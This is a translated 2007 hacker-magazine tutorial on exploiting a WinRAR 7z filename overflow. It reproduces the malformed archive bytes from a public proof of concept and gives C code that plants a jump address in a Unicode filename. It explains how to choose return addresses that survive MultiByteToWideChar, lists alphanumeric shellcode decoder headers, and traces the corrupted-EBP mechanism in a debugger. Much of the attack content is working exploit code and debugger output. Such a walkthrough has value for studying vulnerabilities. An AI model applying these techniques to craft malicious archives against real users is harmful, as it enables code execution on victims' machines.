Analysis and Exploitation of the WinRAR 7z Archive Processing Overflow

ID MYHACK58:62200717380
Type myhack58
Reporter Anonymous
Modified 2007-10-25T00:00:00


This article was published in the April 2007 issue of Hacker Defense (黑客防线). The author and Hacker Defense retain the copyright; if you reproduce it, please credit the original source.

Intended readers: overflow enthusiasts. Prerequisites: assembly language, buffer overflow fundamentals.

Text and figures: 孤烟逐云 (gyzy) [Jiangsu University Information Security & Evil Octal Information Security Team]

At the end of 2006, security.nnov.ru released a PoC for a WinRAR 7z overflow that can lead to execution of malicious code. Some readers may think a problem in the 7z format is not that serious, but WinRAR has a quirk that arguably counts as a bug: it does not identify archives by extension, so a 7z archive renamed to .rar can still be extracted. That is what gives malicious use its opportunity. The Formats directory under the WinRAR installation directory contains many files with the .fmt extension; these are in fact DLLs that the main program calls to handle the different archive formats. Back in July a stack overflow was also found in the LZH format handler, but strictly speaking this 7z overflow cannot be called a stack overflow. The reason will be clear after the vulnerability analysis.

Since we already have a PoC, there is no need to read the 7z format specification ourselves. 7z is open source, and both the format description and the source code can be downloaded from its official site; interested readers can study the 7z file format in detail. Here I directly give the malformed archive that the author already constructed in the published PoC code:

unsigned char hz_part1[] =
    "\x37\x7A\xBC\xAF\x27\x1C\x00\x02"   // the first 8 bytes are fixed
    "\xEE\xD6\x49\x23"                   // CRC1: 32-bit CRC of the 7z header
    "\x00\x00\x00\x00\x00\x00\x00\x00"   // offset of the next header, 0 here
    "\x2D\x40\x00\x00\x00\x00\x00\x00"   // length of the next header, 0x402D here
    "\x3D\xC3\xFE\x9B"                   // CRC2: CRC of everything after the first 32 bytes
    "\x01\x05\x01\x0E\x01\x80\x0F\x01\x80\x11\x80\x01\x00"; // start of the next header

char filename[0x400A]; // long file name, Unicode-encoded

unsigned char hz_part2[] =
    "\x14\x0A\x01\x00\xF0\xDE\xE9\xB5\xBF\xF2\xC6\x01\x15\x06\x01\x00"
    "\x20\x00\x00\x00\x00\x00";          // file attributes and other information

With that, a malformed 7z archive is constructed. Compare your own file byte by byte against the screenshot in Figure 1.


Figure 1

Don't rush to open it yet. WinRAR performs CRC32 verification on 7z archives, and if a checksum is wrong it reports that the archive is damaged, so we must recalculate the CRC values. Fortunately, the expert czy published a 7z CRC calculation program on his blog; I made a few small changes on top of it, with thanks. If you want to write your own for practice, there is one thing to note: the second CRC value indirectly affects the first CRC, so you must calculate the second CRC first. CRC32 implementations are everywhere online, so I won't go into the algorithm. The 7zCRC.exe I provide corrects test.rar in the current directory by default; please keep that in mind as well. 7zCRC.exe can be found in the supporting code on the Hacker Defense website.
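The ordering constraint can be sketched in portable C. This is a minimal sketch, not the author's 7zCRC.exe: the helper names (`crc32_buf`, `rd32`, `sevenz_fix_crcs`) are made up for illustration, and the field offsets are taken from the header layout shown in hz_part1 (CRC1 at byte 8, next-header offset at 12, length at 20, CRC2 at 28). It assumes CRC1 covers the 20 bytes from offset 12 to 31, which is why CRC2 has to be written first.

```c
#include <stddef.h>
#include <stdint.h>

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bit by bit for brevity. */
static uint32_t crc32_buf(const unsigned char *p, size_t n)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return crc ^ 0xFFFFFFFFu;
}

/* Little-endian field accessors. */
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint64_t rd64(const unsigned char *p)
{
    return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32);
}

static void wr32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Recompute both checksums in place.
   Returns 0 on success, -1 if the header fields point outside the buffer. */
static int sevenz_fix_crcs(unsigned char *buf, size_t len)
{
    if (len < 32)
        return -1;
    uint64_t off = rd64(buf + 12);   /* next-header offset, relative to byte 32 */
    uint64_t size = rd64(buf + 20);  /* next-header length */
    if (off > len - 32 || size > len - 32 - off)
        return -1;
    /* CRC2 first: it is stored inside the range that CRC1 covers. */
    wr32(buf + 28, crc32_buf(buf + 32 + (size_t)off, (size_t)size));
    /* CRC1 over offset, length and CRC2 (bytes 12..31). */
    wr32(buf + 8, crc32_buf(buf + 12, 20));
    return 0;
}
```

Computing the two values in the opposite order would leave CRC1 stale as soon as CRC2 is rewritten, which is the indirect dependency the text warns about.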

A First Try

You may wonder why the file name in Figure 1 is filled with a repeated 0x9960. The answer is Unicode: 7z requires file names to be Unicode-encoded, and 0x9960 is the Unicode form of two NOPs (0x90). I won't explain Unicode at length, but one point must be kept in mind: bytes of 0x80 and above get translated. For example, 0x4100 is, as we all know, an uppercase A, but 0x9000 is not the NOP everyone is familiar with; depending on the locale, 0x90 may be translated into garbage. It is exactly this that causes a lot of trouble for a clean exploit. Double-click to open the archive, then click Extract To to trigger the bug. WinRAR crashes, as shown in Figure 2:


Figure 2

Offset: 90909090. EIP has been overwritten. The next step is to locate the overflow point. There are two ways to locate it, which I won't repeat here; look them up in earlier issues of Hacker Defense. I'll give the result directly: the overflow point is the four bytes starting at filename+8. Since our shellcode is on the stack, the habitual first thought is the universal jmp esp address for Chinese-language Windows 2000/XP/2003, 0x7FFA4512. Here is my code:

// Write the long file name
char content[0x2005];                        // 0x400A / 2 = 0x2005, for the ASCII-to-Unicode conversion
memset(content, 0x41, 0x2005);               // filling with 0x41 avoids translation problems
memcpy(content + 4, "\x12\x45\xfa\x7f", 4);  // content+4 becomes filename+8 after the conversion
// The last argument is a count of wide characters, not bytes: 0x400A / 2 = 0x2005
MultiByteToWideChar(CP_ACP, 0, content, 0x2005, (LPWSTR)filename, 0x2005); // convert
WriteFile(h7z, (LPCVOID)filename, 0x400A, &dwWritten, NULL);

At this point the stack is located around 0x017Dxxxx. Regenerate the archive right away and open it. The faulting address, however, is not on the stack, which means EIP did not jump into the stack, as shown in Figure 3:


Figure 3

Strange, 3f? After checking some references: Unicode is a double-byte encoding, and 3f stands for an unknown character. After passing through MultiByteToWideChar, the first 16 bytes of the file name have turned into \x41\x00\x41\x00\x41\x00\x41\x00\x12\x00\x45\x00\x3f\x00\x41, so this address will not work. The PoC author used the address 0x100201BB, which lies in the .rdata section of 7zxa.dll. It does contain a 0xBB, but since that byte sits at one end of the address, we can still pad one byte next to it and need not fear translation. In testing, however, I found that the load base of 7z.fmt and 7z.dll is different almost every time, so this address has to be abandoned too. Do we really have to give up?
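The effect can be reproduced with a toy model in portable C. This is only a sketch under loud assumptions: it is not the real MultiByteToWideChar, the function name `toy_mb_to_utf16le` is made up, and it assumes a double-byte code page in which every byte of 0x80 or above is a lead byte that swallows the following byte, with the pair treated as unmappable and replaced by '?' (0x3F). Real code pages map many such pairs to valid characters.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy widening model (assumption, see lead-in): bytes below 0x80 become
   <byte> 0x00; a byte >= 0x80 consumes the next byte and yields 0x3F 0x00.
   Returns the number of bytes written to out. */
static size_t toy_mb_to_utf16le(const unsigned char *in, size_t n,
                                unsigned char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < n && o + 2 <= cap; i++) {
        unsigned char lo = in[i];
        if (in[i] >= 0x80) {
            if (i + 1 < n)
                i++;        /* swallow the assumed trail byte */
            lo = 0x3F;      /* assumed unmappable: default character '?' */
        }
        out[o++] = lo;      /* UTF-16LE: low byte first */
        out[o++] = 0x00;
    }
    return o;
}
```

Feeding it 41 41 41 41 12 45 FA 7F 41 gives 41 00 41 00 41 00 41 00 12 00 45 00 3F 00 41 00 under these assumptions: the 0xFA 0x7F pair collapses into a single 3F 00, which matches the byte sequence quoted above.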

Tricks

Our jump address must meet these conditions: 1. It must be able to jump back into the stack. 2. None of its four bytes may be 0x80 or above. 3. Failing that, any byte of 0x80 or above must not fall in the two middle positions. I went through the memory map in OllyDbg (OD), searching one module after another. Hard work pays off: in the .text section of Shell32.dll, the highest-loaded of all the modules, I actually found one: 0x7D646981. The jump address can then be constructed as 0x4100 0x4100 0x4100 0x8A7C 0x6900 0x6400 0x7D00, where 0x8A7C is the Unicode form of 0x81. This is not a perfect solution, since 0x7D646981 is not a jmp esp on every system, but under the same service pack the load base of Shell32.dll should be fixed. How to make it universal is left to the reader. The problem of reaching the shellcode is settled for now. The next problem is a shellcode that can survive the conversion. Right: a purely alphanumeric shellcode meets the requirement and withstands whatever MultiByteToWideChar does to it. Fortunately, the previous issue of Hacker Defense just published an article on writing purely alphanumeric shellcode, otherwise I would have had to type for another hour :) I don't know whether everyone already has their own alphanumeric shellcode; if not, here is a generator template I found for everyone to use:

{ "nops", "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body }, { "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body }, { "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp-1 0]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+1 0]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+1 4]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+1 8]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code

These are the decoder headers; which one to use depends on which register points at the shellcode at the moment of the overflow. The main function that generates the shellcode is in alphashellcode in the supporting code. We should choose the decoder header TYIIIIIIIIIIIIIIII7QZ. The shellcode itself is rather long, so I won't attach it, lest I be accused of padding the article for royalties. Test again: success, as shown in Figure 4:


Figure 4

Layers of Doubt

Although the exploit succeeded, I wonder whether you have noticed some rather strange things: 1. If this is a stack overflow, why is the overflow point at the very front of the overlong string rather than in the middle or at the end? Is the buffer only 1 byte long? 2. Why does opening the archive not trigger the vulnerability, while extracting does? 3. Why does gyzy say that strictly speaking this is not a stack overflow? (Sweat..) With this series of questions, any guess in words is pale, so let OD unravel the mystery for us. A small gripe along the way: OD's handling of multithreading is really not great, and it often hangs for no apparent reason. First load WinRAR.exe and let it run in OD. Remember to change the jump address, to avoid the embarrassment of never hitting a break, and remember to correct the CRC values, otherwise WinRAR will politely warn you. Pray that your machine does not hang, amen. See Figure 5:


Figure 5

I found the original build of OD a little more stable, so I used that. At this point EIP has been overwritten. I scrolled up and down in the stack window and could not find a single normal return address. Strange: surely not every return address was overwritten? Not a single clue was left behind, whereas normally a stack backtrace makes it easy to find the faulty code. Things were getting more and more confusing. Press Ctrl+F2 to restart, F9 to let it run, then bp CreateThread and break there, because extracting files obviously needs a new thread. You will find that 0049CDFC is the start address of the new thread. Then step through for a while (N steps omitted; writing them all out would feel like writing a novel) until you reach this place:

0045BD63 |. E8 7466FBFF     |CALL WinRAR.004123DC
0045BD68 |. 84C0            |TEST AL,AL
0045BD6A |. 74 04           |JE SHORT WinRAR.0045BD70
0045BD6C |. B0 01           |MOV AL,1
0045BD6E |. EB 0F           |JMP SHORT WinRAR.0045BD7F
0045BD70 |> 43              |INC EBX
0045BD71 |> 3B9F 04040000    CMP EBX,DWORD PTR DS:[EDI+404]
0045BD77 |.^ 0F8C 41FFFFFF  \JL WinRAR.0045BCBE
0045BD7D |. 33C0             XOR EAX,EAX
0045BD7F |> 5F               POP EDI
0045BD80 |. 5E               POP ESI
0045BD81 |. 5B               POP EBX
0045BD82 |. 8BE5             MOV ESP,EBP
0045BD84 |. 5D               POP EBP
0045BD85 \. C2 0800          RETN 8

EIP is overwritten when this function returns. The RETN 8 instruction means that 8 bytes must be left after the return address before the shellcode follows. Set a breakpoint at 0045BD80, as shown in Figure 6:


Figure 6

Suddenly Clear

At this point, however, ESP is still 01DCF80C, so how does execution later end up at 017D6578? The answer lies in the MOV ESP,EBP at 0045BD82 below, and EBP is precisely 017D6578. This explains all the earlier questions: why the stack backtrace shows no call information when the exception occurs, and why the overflow point appears in the first few bytes of the string. The answer is that the EBP value has been corrupted. Repeat the steps above and set a hardware write breakpoint on 01DCF8E8, which holds the EBP value before it is overwritten. The following code overwrites the correct EBP value on the stack:

00494AD8 |. 57              PUSH EDI
00494AD9 |. 8B7D 08         MOV EDI,DWORD PTR SS:[EBP+8]
00494ADC |. 8BC7            MOV EAX,EDI
00494ADE |. 8B75 0C         MOV ESI,DWORD PTR SS:[EBP+C]
00494AE1 |. 8B4D 10         MOV ECX,DWORD PTR SS:[EBP+10]
00494AE4 |. 8BD1            MOV EDX,ECX
00494AE6 |. D1E9            SHR ECX,1
00494AE8 |. D1E9            SHR ECX,1
00494AEA |. FC              CLD                          ; ecx 203
00494AEB |. F3:A5           REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
00494AED |. 8BCA            MOV ECX,EDX
00494AEF |. 83E1 03         AND ECX,3                    ; 2
00494AF2 |. F3:A4           REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00494AF4 |. 5F              POP EDI
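The listing reads like an ordinary memcpy-style routine: destination in [EBP+8], source in [EBP+C], byte count in [EBP+10], copied as count/4 dwords followed by count%4 single bytes. A rough C equivalent, offered as a reading aid rather than recovered source (the name `copy_like_listing` is made up):

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mirrors the listing: n >> 2 dword moves (REP MOVS DWORD), then n & 3
   byte moves (REP MOVS BYTE). Like the original, it has no idea how large
   the destination is; it trusts the caller's count. Returns dst, as EAX
   holds EDI from the start of the routine. */
static void *copy_like_listing(void *dst, const void *src, size_t n)
{
    unsigned char *d = dst;
    const unsigned char *s = src;
    size_t dwords = n >> 2;   /* SHR ECX,1 twice */
    size_t tail = n & 3;      /* AND ECX,3 */

    for (size_t i = 0; i < dwords; i++, d += 4, s += 4)
        memcpy(d, s, 4);      /* one MOVSD */
    while (tail--)
        *d++ = *s++;          /* one MOVSB */
    return dst;
}
```

If the annotations "ecx 203" and "2" in the listing are the dword count and the tail count (an inference, the article does not say), the copy length in that run would be 0x203 * 4 + 2 = 0x80E bytes.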

Skipping another N steps, it finally turns out that the instruction at 00412562 is what corrupts EBP; then, by the time execution reaches 0045BD82, ESP is overwritten indirectly.

00412562 |. 5D POP EBP
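The chain of events (a POP EBP that loads an overwritten saved EBP, followed later by MOV ESP,EBP / POP EBP / RETN 8) can be walked through with a toy model in C. Everything here is hypothetical: the tiny memory, the addresses 0x1010, 0x1070 and 0x1080, and the helper names are made up for illustration, and the intermediate instructions between the two epilogues are left out.

```c
#include <stdint.h>
#include <string.h>

#define MEM_BASE 0x1000u
#define MEM_SIZE 0x100u

typedef struct {
    uint32_t esp, ebp, eip;
    unsigned char mem[MEM_SIZE];   /* toy memory covering 0x1000..0x10FF */
} toy_cpu;

static uint32_t peek32(const toy_cpu *c, uint32_t addr)
{
    uint32_t i = addr - MEM_BASE;
    if (addr < MEM_BASE || i + 4 > MEM_SIZE)
        return 0;                  /* out of range in the toy model */
    return (uint32_t)c->mem[i] | ((uint32_t)c->mem[i + 1] << 8) |
           ((uint32_t)c->mem[i + 2] << 16) | ((uint32_t)c->mem[i + 3] << 24);
}

static void poke32(toy_cpu *c, uint32_t addr, uint32_t v)
{
    uint32_t i = addr - MEM_BASE;
    if (addr < MEM_BASE || i + 4 > MEM_SIZE)
        return;
    c->mem[i] = (unsigned char)v;
    c->mem[i + 1] = (unsigned char)(v >> 8);
    c->mem[i + 2] = (unsigned char)(v >> 16);
    c->mem[i + 3] = (unsigned char)(v >> 24);
}

/* POP EBP: the instruction found at 00412562. */
static void pop_ebp(toy_cpu *c)
{
    c->ebp = peek32(c, c->esp);
    c->esp += 4;
}

/* MOV ESP,EBP / POP EBP / RETN 8: the tail of the listing at 0045BD82. */
static void leave_retn8(toy_cpu *c)
{
    c->esp = c->ebp;               /* ESP now follows whatever EBP holds */
    pop_ebp(c);
    c->eip = peek32(c, c->esp);    /* return address */
    c->esp += 4 + 8;               /* RETN 8 also drops 8 bytes of arguments */
}

/* Run both epilogues with a given value in the saved-EBP slot. */
static toy_cpu run_epilogues(uint32_t saved_ebp_value)
{
    toy_cpu c;
    memset(&c, 0, sizeof c);
    poke32(&c, 0x1010, 0x41414141u);     /* copied name, bytes 0..3: filler */
    poke32(&c, 0x1014, 0x11223344u);     /* copied name, bytes 4..7: marker */
    poke32(&c, 0x1084, 0x00401000u);     /* legitimate return address */
    poke32(&c, 0x1070, saved_ebp_value); /* saved EBP slot of the inner frame */
    c.esp = 0x1070;
    pop_ebp(&c);                         /* inner function restores EBP */
    leave_retn8(&c);                     /* outer function returns */
    return c;
}
```

With the slot intact (0x1080) the model returns to 0x00401000. With the slot pointing at the copied name (0x1010) it returns to the marker taken from bytes 4..7 of the name and ends with ESP 16 bytes into it, which is consistent with the overflow point sitting at the front of the string and with the 8 reserved bytes after the return address.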

Having traced this far, it gets rather interesting: it is hard to call this a standard stack overflow that overwrites a return address or the SEH chain, yet it does overwrite the return address indirectly. In recent years file-processing vulnerabilities in all kinds of third-party software have been on the rise. Personally I feel that this class of vulnerability can basically only be found by black-box testing; code auditing may have a hard time finding it. The author's discovery this time also involved some luck: with a slightly shorter file name, such a well-hidden bug might not have been triggered at all. It is also not convenient to exploit; if the overflow point were a little further back, the start of the file name could at least be disguised as something enticing. Alas... Still, it makes good practice and touches on many different topics.